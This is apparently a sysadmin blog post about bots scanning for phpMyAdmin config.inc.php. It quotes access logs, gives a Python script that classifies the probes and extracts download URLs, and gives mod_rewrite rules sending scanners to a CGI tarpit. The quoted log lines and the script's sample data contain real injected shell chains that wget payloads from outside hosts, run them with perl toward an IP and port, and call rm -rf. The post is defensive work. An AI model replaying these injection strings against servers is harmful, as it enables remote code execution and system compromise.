Once or twice a night, I get visits from bots running on zombies, knocking on the usual phpMyAdmin and MySQL admin paths, ranging from simple sniffs:
82.192.88.11 - - [26/May/2010:07:27:05 -0500] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 302
82.192.88.11 - - [26/May/2010:07:27:05 -0500] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 304
82.192.88.11 - - [26/May/2010:07:27:06 -0500] "GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 306
82.192.88.11 - - [26/May/2010:07:27:06 -0500] "GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 304
82.192.88.11 - - [26/May/2010:07:27:06 -0500] "GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 311
82.192.88.11 - - [26/May/2010:07:27:07 -0500] "GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 306
82.192.88.11 - - [26/May/2010:07:27:07 -0500] "GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 309
82.192.88.11 - - [26/May/2010:07:27:07 -0500] "GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 309
82.192.88.11 - - [26/May/2010:07:27:07 -0500] "GET //config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 298
82.192.88.11 - - [26/May/2010:07:27:08 -0500] "GET //phppgadmin/config.inc.php?p=phpinfo(); HTTP/1.1" 404 302
82.192.88.11 - - [26/May/2010:07:27:08 -0500] "GET //phpmyadmin2/config.inc.php?p=phpinfo(); HTTP/1.1" 404 303
82.192.88.11 - - [26/May/2010:07:27:08 -0500] "GET //phpMyAdmin2/config.inc.php?p=phpinfo(); HTTP/1.1" 404 303
82.192.88.11 - - [26/May/2010:07:27:09 -0500] "GET //mail/config.inc.php?p=phpinfo(); HTTP/1.1" 404 296
82.192.88.11 - - [26/May/2010:07:27:09 -0500] "GET //webmail/config.inc.php?p=phpinfo(); HTTP/1.1" 404 299
to brazen attempts:
85.214.71.129 - - [09/Jul/2009:01:15:09 -0500] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20213.192.4.246/apache2-default/font-nix;perl%20font-nix HTTP/1.1" 404 309
85.214.71.129 - - [09/Jul/2009:01:15:10 -0500] "GET /phpmyadmin/config/config.inc.php?c=cd%20/tmp;wget%20213.192.4.246/apache2-default/font-nix;perl%20font-nix HTTP/1.1" 404 309
216.177.193.80 - - [13/Aug/2009:11:48:54 -0500] "GET //phpmyadmin//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 404 310
216.177.193.80 - - [13/Aug/2009:11:48:54 -0500] "GET //phpmyadmin//config/config.inc.php?c=cd%20/tmp;wget%20http://adoglife.com/nc.tgz;perl%20nc.tgz%2061.75.175.137%208080;rm%20-rf%20 //HTTP/1.1" 404 310
216.177.193.80 - - [13/Aug/2009:12:45:30 -0500] "GET //phpMyAdmin//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 404 310
216.177.193.80 - - [13/Aug/2009:12:45:30 -0500] "GET //phpMyAdmin//config/config.inc.php?c=cd%20/tmp;wget%20http://adoglife.com/nc.tgz;perl%20nc.tgz%2061.75.175.137%208080;rm%20-rf%20 //HTTP/1.1" 404 310
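Both kinds of probe hit the same fake path (config.inc.php) and differ only in the query string: the sniffs pass p=phpinfo(), the brazen ones pass c= followed by a shell command chain that fetches and runs a payload. The script below is an added example (not code from the original post) that parses log lines of the kind shown above, URL-decodes the query, and separates the reconnaissance probes from the command-injection attempts, pulling out the injected commands and any download URLs so they can be blocked or reported. The log lines embedded in it are constructed copies of the entries above plus one ordinary request from a TEST-NET address; the function names and the labels recon/exec/probe are this example's own.

```python
"""Classify phpMyAdmin config.inc.php probes in Apache access-log lines.

Added example, not code from the original post. SAMPLE_LOG is constructed
from the log entries quoted on the page plus one benign request.
"""
import re
from urllib.parse import unquote_plus

# Apache common/combined log prefix: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# The scanners vary the directory but always ask for config.inc.php
PROBE_PATH_RE = re.compile(r'config\.inc\.php', re.IGNORECASE)
# Commands whose arguments are worth extracting as download indicators
DOWNLOADERS = ('wget', 'curl', 'fetch', 'lwp-download')

SAMPLE_LOG = """\
82.192.88.11 - - [26/May/2010:07:27:05 -0500] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 302
82.192.88.11 - - [26/May/2010:07:27:07 -0500] "GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 309
85.214.71.129 - - [09/Jul/2009:01:15:09 -0500] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20213.192.4.246/apache2-default/font-nix;perl%20font-nix HTTP/1.1" 404 309
216.177.193.80 - - [13/Aug/2009:11:48:54 -0500] "GET //phpmyadmin//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 404 310
216.177.193.80 - - [13/Aug/2009:11:48:54 -0500] "GET //phpmyadmin//config/config.inc.php?c=cd%20/tmp;wget%20http://adoglife.com/nc.tgz;perl%20nc.tgz%2061.75.175.137%208080 HTTP/1.1" 404 310
198.51.100.7 - - [26/May/2010:08:00:00 -0500] "GET /index.html HTTP/1.1" 200 1532
"""


def parse_query(query):
    """Decode a form-encoded query string into a dict (first '=' splits key/value)."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    path, _, query = entry['target'].partition('?')
    entry['path'] = path
    entry['params'] = parse_query(query)
    return entry


def download_urls(commands):
    """Collect non-option arguments of downloader commands in an injected chain."""
    urls = []
    for cmd in commands:
        argv = cmd.split()
        if argv and argv[0] in DOWNLOADERS:
            urls.extend(a for a in argv[1:] if not a.startswith('-'))
    return urls


def classify(entry):
    """Label an entry: ('normal', None), ('recon', info), ('exec', info) or ('probe', {})."""
    if not PROBE_PATH_RE.search(entry['path']):
        return 'normal', None
    params = entry['params']
    if 'c' in params:
        # ?c= carries a ';'-separated shell chain: split it into individual commands
        commands = [c.strip() for c in params['c'].split(';') if c.strip()]
        return 'exec', {'commands': commands, 'downloads': download_urls(commands)}
    if 'p' in params:
        # ?p=phpinfo(); is the low-effort check for a vulnerable include
        return 'recon', {'php': params['p']}
    return 'probe', {}


def summarize(log_text):
    """Per-source-IP counts of each probe kind plus the set of download URLs seen."""
    report = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        kind, info = classify(entry)
        if kind == 'normal':
            continue
        rec = report.setdefault(
            entry['ip'], {'recon': 0, 'exec': 0, 'probe': 0, 'downloads': set()})
        rec[kind] += 1
        if info and info.get('downloads'):
            rec['downloads'].update(info['downloads'])
    return report


if __name__ == '__main__':
    for ip, rec in summarize(SAMPLE_LOG).items():
        print(ip, rec)
```

Run it against a real access_log by replacing SAMPLE_LOG with the file contents; the download URLs it extracts are the indicators worth feeding to an egress block list, since the payload fetch is the step that actually matters if a vulnerable script ever does exist on the host.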
There isn't much we can do about it, but we can still return some favors. There is an Apache module called mod_security, but there isn't a pre-made package that works with CentOS 5.5. I have tried using the RPM from Jason Litka's website, but I get an error about missing dependencies when starting up Apache. I don't have development packages installed on any of my servers, and I didn't feel like prepping a virtual machine just to rebuild the package.
But in the meantime, there is still some damage we can inflict using just mod_rewrite.
Just add this to the Apache configuration file (either globally or inside the VirtualHost stanza). Note that both rules match on the request path alone, so they will also catch a real phpMyAdmin install on the same host; only use them where no such install exists:
RewriteEngine On
RewriteRule ^.*config\.inc\.php.*$ /var/www/cgi-bin/tarpit.cgi [L]
RewriteRule ^.*phpMyAdmin.*$ /var/www/cgi-bin/tarpit.cgi [NC,L]
And the contents of my tarpit.cgi?
#!/bin/sh
# Minimal CGI tarpit: send the headers, then dribble out a reply over 30 seconds
echo "Content-type: text/plain"
echo ""
sleep 10
echo "Do you feel lucky?"
sleep 10
echo "Well, do ya, punk?"
sleep 10
Now it will take them 5 minutes to scan my site instead of 5 seconds, at almost no cost in CPU. The cost is elsewhere: each tarpitted request holds an Apache worker for the 30 seconds the script sleeps, so a scanner that opens many connections in parallel can tie up workers, and MaxClients needs to be sized with that in mind. Who knows, maybe the bot will get excited at not getting a 404 back and decide to probe further. We'll see...